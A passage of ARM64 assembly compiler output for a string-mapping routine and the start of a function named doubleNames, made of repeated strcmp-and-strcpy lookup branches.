adrp x1, l_.str.58@PAGE add x1, x1, l_.str.58@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_66: ldr x0, [sp, #8] adrp x1, l_.str.59@PAGE add x1, x1, l_.str.59@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_68 b LBB2_67 LBB2_67: ldr x0, [sp] adrp x1, l_.str.59@PAGE add x1, x1, l_.str.59@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_68: ldr x0, [sp, #8] adrp x1, l_.str.60@PAGE add x1, x1, l_.str.60@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_70 b LBB2_69 LBB2_69: ldr x0, [sp] adrp x1, l_.str.60@PAGE add x1, x1, l_.str.60@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_70: ldr x0, [sp, #8] adrp x1, l_.str.61@PAGE add x1, x1, l_.str.61@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_72 b LBB2_71 LBB2_71: ldr x0, [sp] adrp x1, l_.str.61@PAGE add x1, x1, l_.str.61@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_72: ldr x0, [sp, #8] adrp x1, l_.str.62@PAGE add x1, x1, l_.str.62@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_74 b LBB2_73 LBB2_73: ldr x0, [sp] adrp x1, l_.str.62@PAGE add x1, x1, l_.str.62@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_74: ldr x0, [sp, #8] adrp x1, l_.str.63@PAGE add x1, x1, l_.str.63@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_76 b LBB2_75 LBB2_75: ldr x0, [sp] adrp x1, l_.str.63@PAGE add x1, x1, l_.str.63@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_76: ldr x0, [sp, #8] adrp x1, l_.str.64@PAGE add x1, x1, l_.str.64@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_78 b LBB2_77 LBB2_77: ldr x0, [sp] adrp x1, l_.str.64@PAGE add x1, x1, l_.str.64@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_78: ldr x0, [sp, #8] adrp x1, l_.str.65@PAGE add x1, x1, l_.str.65@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_80 b LBB2_79 LBB2_79: ldr x0, [sp] adrp x1, l_.str.65@PAGE add x1, x1, l_.str.65@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_80: ldr x0, [sp, #8] adrp x1, l_.str.66@PAGE add x1, x1, l_.str.66@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_82 b LBB2_81 LBB2_81: ldr x0, [sp] adrp x1, l_.str.66@PAGE add x1, x1, l_.str.66@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_82: ldr x0, [sp, #8] adrp x1, l_.str.67@PAGE add x1, x1, l_.str.67@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_84 b LBB2_83 LBB2_83: ldr x0, [sp] adrp x1, l_.str.67@PAGE add x1, x1, l_.str.67@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_84: ldr x0, [sp, #8] adrp x1, l_.str.68@PAGE add x1, x1, l_.str.68@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_86 b LBB2_85 LBB2_85: ldr x0, [sp] adrp x1, l_.str.68@PAGE add x1, x1, l_.str.68@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_86: ldr x0, [sp, #8] adrp x1, l_.str.69@PAGE add x1, x1, l_.str.69@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_88 b LBB2_87 LBB2_87: ldr x0, [sp] adrp x1, l_.str.69@PAGE add x1, x1, l_.str.69@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_88: ldr x0, [sp, #8] adrp x1, l_.str.70@PAGE add x1, x1, l_.str.70@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_90 b LBB2_89 LBB2_89: ldr x0, [sp] adrp x1, l_.str.70@PAGE add x1, x1, l_.str.70@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_90: ldr x0, [sp, #8] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_92 b LBB2_91 LBB2_91: ldr x0, [sp] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_92: ldr x0, [sp, #8] adrp x1, l_.str.71@PAGE add x1, x1, l_.str.71@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_94 b LBB2_93 LBB2_93: ldr x0, [sp] adrp x1, l_.str.71@PAGE add x1, x1, l_.str.71@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_94: ldr x0, [sp, #8] adrp x1, l_.str.72@PAGE add x1, x1, l_.str.72@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_96 b LBB2_95 LBB2_95: ldr x0, [sp] adrp x1, l_.str.72@PAGE add x1, x1, l_.str.72@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_96: ldr x0, [sp, #8] adrp x1, l_.str.73@PAGE add x1, x1, l_.str.73@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_98 b LBB2_97 LBB2_97: ldr x0, [sp] adrp x1, l_.str.73@PAGE add x1, x1, l_.str.73@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_98: ldr x0, [sp, #8] adrp x1, l_.str.74@PAGE add x1, x1, l_.str.74@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_100 b LBB2_99 LBB2_99: ldr x0, [sp] adrp x1, l_.str.74@PAGE add x1, x1, l_.str.74@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_100: ldr x0, [sp, #8] adrp x1, l_.str.75@PAGE add x1, x1, l_.str.75@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_102 b LBB2_101 LBB2_101: ldr x0, [sp] adrp x1, l_.str.75@PAGE add x1, x1, l_.str.75@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_102: ldr x0, [sp, #8] adrp x1, l_.str.76@PAGE add x1, x1, l_.str.76@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_104 b LBB2_103 LBB2_103: ldr x0, [sp] adrp x1, l_.str.76@PAGE add x1, x1, l_.str.76@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_104: ldr x0, [sp, #8] adrp x1, l_.str.77@PAGE add x1, x1, l_.str.77@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_106 b LBB2_105 LBB2_105: ldr x0, [sp] adrp x1, l_.str.77@PAGE add x1, x1, l_.str.77@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_106: ldr x0, [sp, #8] adrp x1, l_.str.78@PAGE add x1, x1, l_.str.78@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_108 b LBB2_107 LBB2_107: ldr x0, [sp] adrp x1, l_.str.78@PAGE add x1, x1, l_.str.78@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_108: ldr x0, [sp, #8] adrp x1, l_.str.79@PAGE add x1, x1, l_.str.79@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_110 b LBB2_109 LBB2_109: ldr x0, [sp] adrp x1, l_.str.79@PAGE add x1, x1, l_.str.79@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_110: ldr x0, [sp, #8] adrp x1, l_.str.80@PAGE add x1, x1, l_.str.80@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_112 b LBB2_111 LBB2_111: ldr x0, [sp] adrp x1, l_.str.80@PAGE add x1, x1, l_.str.80@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_112: ldr x0, [sp, #8] adrp x1, l_.str.81@PAGE add x1, x1, l_.str.81@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_114 b LBB2_113 LBB2_113: ldr x0, [sp] adrp x1, l_.str.81@PAGE add x1, x1, l_.str.81@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_114: ldr x0, [sp, #8] adrp x1, l_.str.82@PAGE add x1, x1, l_.str.82@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_116 b LBB2_115 LBB2_115: ldr x0, [sp] adrp x1, l_.str.82@PAGE add x1, x1, l_.str.82@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_116: ldr x0, [sp, #8] adrp x1, l_.str.83@PAGE add x1, x1, l_.str.83@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_118 b LBB2_117 LBB2_117: ldr x0, [sp] adrp x1, l_.str.83@PAGE add x1, x1, l_.str.83@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_118: ldr x0, [sp, #8] adrp x1, l_.str.84@PAGE add x1, x1, l_.str.84@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_120 b LBB2_119 LBB2_119: ldr x0, [sp] adrp x1, l_.str.84@PAGE add x1, x1, l_.str.84@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_120: ldr x0, [sp, #8] adrp x1, l_.str.85@PAGE add x1, x1, l_.str.85@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_122 b LBB2_121 LBB2_121: ldr x0, [sp] adrp x1, l_.str.85@PAGE add x1, x1, l_.str.85@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_122: ldr x0, [sp, #8] adrp x1, l_.str.86@PAGE add x1, x1, l_.str.86@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_124 b LBB2_123 LBB2_123: ldr x0, [sp] adrp x1, l_.str.86@PAGE add x1, x1, l_.str.86@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_124: ldr x0, [sp, #8] adrp x1, l_.str.87@PAGE add x1, x1, l_.str.87@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_126 b LBB2_125 LBB2_125: ldr x0, [sp] adrp x1, l_.str.87@PAGE add x1, x1, l_.str.87@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_126: ldr x0, [sp, #8] adrp x1, l_.str.88@PAGE add x1, x1, l_.str.88@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_128 b LBB2_127 LBB2_127: ldr x0, [sp] adrp x1, l_.str.88@PAGE add x1, x1, l_.str.88@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_128: ldr x0, [sp, #8] adrp x1, l_.str.89@PAGE add x1, x1, l_.str.89@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_130 b LBB2_129 LBB2_129: ldr x0, [sp] adrp x1, l_.str.89@PAGE add x1, x1, l_.str.89@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_130: ldr x0, [sp, #8] adrp x1, l_.str.20@PAGE add x1, x1, l_.str.20@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_132 b LBB2_131 LBB2_131: ldr x0, [sp] adrp x1, l_.str.20@PAGE add x1, x1, l_.str.20@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_132: ldr x0, [sp, #8] adrp x1, l_.str.90@PAGE add x1, x1, l_.str.90@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_134 b LBB2_133 LBB2_133: ldr x0, [sp] adrp x1, l_.str.90@PAGE add x1, x1, l_.str.90@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_134: ldr x0, [sp, #8] adrp x1, l_.str.91@PAGE add x1, x1, l_.str.91@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_136 b LBB2_135 LBB2_135: ldr x0, [sp] adrp x1, l_.str.91@PAGE add x1, x1, l_.str.91@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_136: ldr x0, [sp, #8] adrp x1, l_.str.92@PAGE add x1, x1, l_.str.92@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_138 b LBB2_137 LBB2_137: ldr x0, [sp] adrp x1, l_.str.92@PAGE add x1, x1, l_.str.92@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_138: ldr x0, [sp, #8] adrp x1, l_.str.93@PAGE add x1, x1, l_.str.93@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_140 b LBB2_139 LBB2_139: ldr x0, [sp] adrp x1, l_.str.93@PAGE add x1, x1, l_.str.93@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_140: ldr x0, [sp, #8] adrp x1, l_.str.94@PAGE add x1, x1, l_.str.94@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_142 b LBB2_141 LBB2_141: ldr x0, [sp] adrp x1, l_.str.94@PAGE add x1, x1, l_.str.94@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_142: ldr x0, [sp, #8] adrp x1, l_.str.95@PAGE add x1, x1, l_.str.95@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_144 b LBB2_143 LBB2_143: ldr x0, [sp] adrp x1, l_.str.95@PAGE add x1, x1, l_.str.95@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_144: ldr x0, [sp, #8] adrp x1, l_.str.96@PAGE add x1, x1, l_.str.96@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_146 b LBB2_145 LBB2_145: ldr x0, [sp] adrp x1, l_.str.96@PAGE add x1, x1, l_.str.96@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_146: ldr x0, [sp, #8] adrp x1, l_.str.97@PAGE add x1, x1, l_.str.97@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_148 b LBB2_147 LBB2_147: ldr x0, [sp] adrp x1, l_.str.97@PAGE add x1, x1, l_.str.97@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_148: ldr x0, [sp, #8] adrp x1, l_.str.98@PAGE add x1, x1, l_.str.98@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_150 b LBB2_149 LBB2_149: ldr x0, [sp] adrp x1, l_.str.98@PAGE add x1, x1, l_.str.98@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_150: ldr x0, [sp, #8] adrp x1, l_.str.99@PAGE add x1, x1, l_.str.99@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_152 b LBB2_151 LBB2_151: ldr x0, [sp] adrp x1, l_.str.99@PAGE add x1, x1, l_.str.99@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_152: ldr x0, [sp, #8] adrp x1, l_.str.100@PAGE add x1, x1, l_.str.100@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_154 b LBB2_153 LBB2_153: ldr x0, [sp] adrp x1, l_.str.100@PAGE add x1, x1, l_.str.100@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_154: ldr x0, [sp, #8] adrp x1, l_.str.101@PAGE add x1, x1, l_.str.101@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_156 b LBB2_155 LBB2_155: ldr x0, [sp] adrp x1, l_.str.101@PAGE add x1, x1, l_.str.101@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_156: ldr x0, [sp, #8] adrp x1, l_.str.22@PAGE add x1, x1, l_.str.22@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_158 b LBB2_157 LBB2_157: ldr x0, [sp] adrp x1, l_.str.22@PAGE add x1, x1, l_.str.22@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_158: ldr x0, [sp, #8] adrp x1, l_.str.102@PAGE add x1, x1, l_.str.102@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_160 b LBB2_159 LBB2_159: ldr x0, [sp] adrp x1, l_.str.102@PAGE add x1, x1, l_.str.102@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_160: ldr x0, [sp, #8] adrp x1, l_.str.103@PAGE add x1, x1, l_.str.103@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_162 b LBB2_161 LBB2_161: ldr x0, [sp] adrp x1, l_.str.103@PAGE add x1, x1, l_.str.103@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_162: ldr x0, [sp, #8] adrp x1, l_.str.104@PAGE add x1, x1, l_.str.104@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_164 b LBB2_163 LBB2_163: ldr x0, [sp] adrp x1, l_.str.104@PAGE add x1, x1, l_.str.104@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_164: ldr x0, [sp, #8] adrp x1, l_.str.17@PAGE add x1, x1, l_.str.17@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_166 b LBB2_165 LBB2_165: ldr x0, [sp] adrp x1, l_.str.17@PAGE add x1, x1, l_.str.17@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_166: ldr x0, [sp, #8] adrp x1, l_.str.105@PAGE add x1, x1, l_.str.105@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_168 b LBB2_167 LBB2_167: ldr x0, [sp] adrp x1, l_.str.105@PAGE add x1, x1, l_.str.105@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_168: ldr x0, [sp, #8] adrp x1, l_.str.106@PAGE add x1, x1, l_.str.106@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_170 b LBB2_169 LBB2_169: ldr x0, [sp] adrp x1, l_.str.106@PAGE add x1, x1, l_.str.106@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_170: ldr x0, [sp, #8] adrp x1, l_.str.106@PAGE add x1, x1, l_.str.106@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_172 b LBB2_171 LBB2_171: ldr x0, [sp] adrp x1, l_.str.106@PAGE add x1, x1, l_.str.106@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_172: ldr x0, [sp, #8] adrp x1, l_.str.15@PAGE add x1, x1, l_.str.15@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_174 b LBB2_173 LBB2_173: ldr x0, [sp] adrp x1, l_.str.15@PAGE add x1, x1, l_.str.15@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_174: ldr x0, [sp, #8] adrp x1, l_.str.107@PAGE add x1, x1, l_.str.107@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_176 b LBB2_175 LBB2_175: ldr x0, [sp] adrp x1, l_.str.107@PAGE add x1, x1, l_.str.107@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_176: ldr x0, [sp, #8] adrp x1, l_.str.108@PAGE add x1, x1, l_.str.108@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_178 b LBB2_177 LBB2_177: ldr x0, [sp] adrp x1, l_.str.108@PAGE add x1, x1, l_.str.108@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_178: ldr x0, [sp, #8] adrp x1, l_.str.109@PAGE add x1, x1, l_.str.109@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_180 b LBB2_179 LBB2_179: ldr x0, [sp] adrp x1, l_.str.109@PAGE add x1, x1, l_.str.109@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_180: ldr x0, [sp, #8] adrp x1, l_.str.110@PAGE add x1, x1, l_.str.110@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_182 b LBB2_181 LBB2_181: ldr x0, [sp] adrp x1, l_.str.110@PAGE add x1, x1, l_.str.110@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_182: ldr x0, [sp, #8] adrp x1, l_.str.111@PAGE add x1, x1, l_.str.111@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_184 b LBB2_183 LBB2_183: ldr x0, [sp] adrp x1, l_.str.111@PAGE add x1, x1, l_.str.111@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_184: ldr x0, [sp, #8] adrp x1, l_.str.112@PAGE add x1, x1, l_.str.112@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_186 b LBB2_185 LBB2_185: ldr x0, [sp] adrp x1, l_.str.112@PAGE add x1, x1, l_.str.112@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_186: ldr x0, [sp, #8] adrp x1, l_.str.113@PAGE add x1, x1, l_.str.113@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_188 b LBB2_187 LBB2_187: ldr x0, [sp] adrp x1, l_.str.113@PAGE add x1, x1, l_.str.113@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_188: ldr x0, [sp, #8] adrp x1, l_.str.114@PAGE add x1, x1, l_.str.114@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_190 b LBB2_189 LBB2_189: ldr x0, [sp] adrp x1, l_.str.114@PAGE add x1, x1, l_.str.114@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_190: ldr x0, [sp, #8] adrp x1, l_.str.115@PAGE add x1, x1, l_.str.115@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_192 b LBB2_191 LBB2_191: ldr x0, [sp] adrp x1, l_.str.115@PAGE add x1, x1, l_.str.115@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_192: ldr x0, [sp, #8] adrp x1, l_.str.116@PAGE add x1, x1, l_.str.116@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_194 b LBB2_193 LBB2_193: ldr x0, [sp] adrp x1, l_.str.116@PAGE add x1, x1, l_.str.116@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_194: ldr x0, [sp, #8] adrp x1, l_.str.117@PAGE add x1, x1, l_.str.117@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_196 b LBB2_195 LBB2_195: ldr x0, [sp] adrp x1, l_.str.118@PAGE add x1, x1, l_.str.118@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_196: ldr x0, [sp, #8] adrp x1, l_.str.119@PAGE add x1, x1, l_.str.119@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_198 b LBB2_197 LBB2_197: ldr x0, [sp] adrp x1, l_.str.118@PAGE add x1, x1, l_.str.118@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_198: ldr x0, [sp, #8] adrp x1, l_.str.120@PAGE add x1, x1, l_.str.120@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_200 b LBB2_199 LBB2_199: ldr x0, [sp] adrp x1, l_.str.118@PAGE add x1, x1, l_.str.118@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_200: ldr x0, [sp, #8] adrp x1, l_.str.121@PAGE add x1, x1, l_.str.121@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_202 b LBB2_201 LBB2_201: ldr x0, [sp] adrp x1, l_.str.118@PAGE add x1, x1, l_.str.118@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB2_202 LBB2_202: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _doubleNames ; -- Begin function doubleNames .p2align 2 _doubleNames: ; @doubleNames .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] str x1, [sp] ldr x0, [sp, #8] adrp x1, l_.str.122@PAGE add x1, x1, l_.str.122@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_2 b LBB3_1 LBB3_1: ldr x0, [sp] adrp x1, l_.str.123@PAGE add x1, x1, l_.str.123@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_2: ldr x0, [sp, #8] adrp x1, l_.str.124@PAGE add x1, x1, l_.str.124@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_4 b LBB3_3 LBB3_3: ldr x0, [sp] adrp x1, l_.str.125@PAGE add x1, x1, l_.str.125@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_4: ldr x0, [sp, #8] adrp x1, l_.str.126@PAGE add x1, x1, l_.str.126@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_6 b LBB3_5 LBB3_5: ldr x0, [sp] adrp x1, l_.str.127@PAGE add x1, x1, l_.str.127@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_6: ldr x0, [sp, #8] adrp x1, l_.str.128@PAGE add x1, x1, l_.str.128@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_8 b LBB3_7 LBB3_7: ldr x0, [sp] adrp x1, l_.str.129@PAGE add x1, x1, l_.str.129@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_8: ldr x0, [sp, #8] adrp x1, l_.str.130@PAGE add x1, x1, l_.str.130@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_10 b LBB3_9 LBB3_9: ldr x0, [sp] adrp x1, l_.str.131@PAGE add x1, x1, l_.str.131@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_10: ldr x0, [sp, #8] adrp x1, l_.str.132@PAGE add x1, x1, l_.str.132@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_12 b LBB3_11 LBB3_11: ldr x0, [sp] adrp x1, l_.str.133@PAGE add x1, x1, l_.str.133@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_12: ldr x0, [sp, #8] adrp x1, l_.str.134@PAGE add x1, x1, l_.str.134@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_14 b LBB3_13 LBB3_13: ldr x0, [sp] adrp x1, l_.str.123@PAGE add x1, x1, l_.str.123@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_14: ldr x0, [sp, #8] adrp x1, l_.str.135@PAGE add x1, x1, l_.str.135@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_16 b LBB3_15 LBB3_15: ldr x0, [sp] adrp x1, l_.str.136@PAGE add x1, x1, l_.str.136@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_16: ldr x0, [sp, #8] adrp x1, l_.str.137@PAGE add x1, x1, l_.str.137@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_18 b LBB3_17 LBB3_17: ldr x0, [sp] adrp x1, l_.str.138@PAGE add x1, x1, l_.str.138@PAGEOFF mov x2, #-1 bl 